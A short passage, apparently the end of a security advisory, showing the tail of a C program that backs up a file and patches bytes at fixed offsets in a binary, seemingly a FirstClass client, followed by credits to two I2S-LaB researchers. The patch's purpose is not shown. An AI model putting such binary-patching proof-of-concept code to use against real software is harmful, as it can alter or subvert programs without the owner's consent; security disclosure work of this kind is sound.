!\n"); ExitProcess(0); } printf ("ok\nMaking backup file of %s...%s", PATH, CopyFile (PATH, "Fcc32.bak", TRUE) ? "ok\n" : "Not possible\n"); printf ("patching binary file..."); for (i=0; Info[i].offset; i++) FirstClass.Write(Info[i].offset, Info[i].buffer, Info[i].NumberOfByte); puts ("ok"); } Credit ______ Aurelien BOUDOUX, (aka ThreaT) aurelien[at]I2S-LaB.com Fred CHAVEROT, (aka ZaQ) fred[at]I2S-LaB.com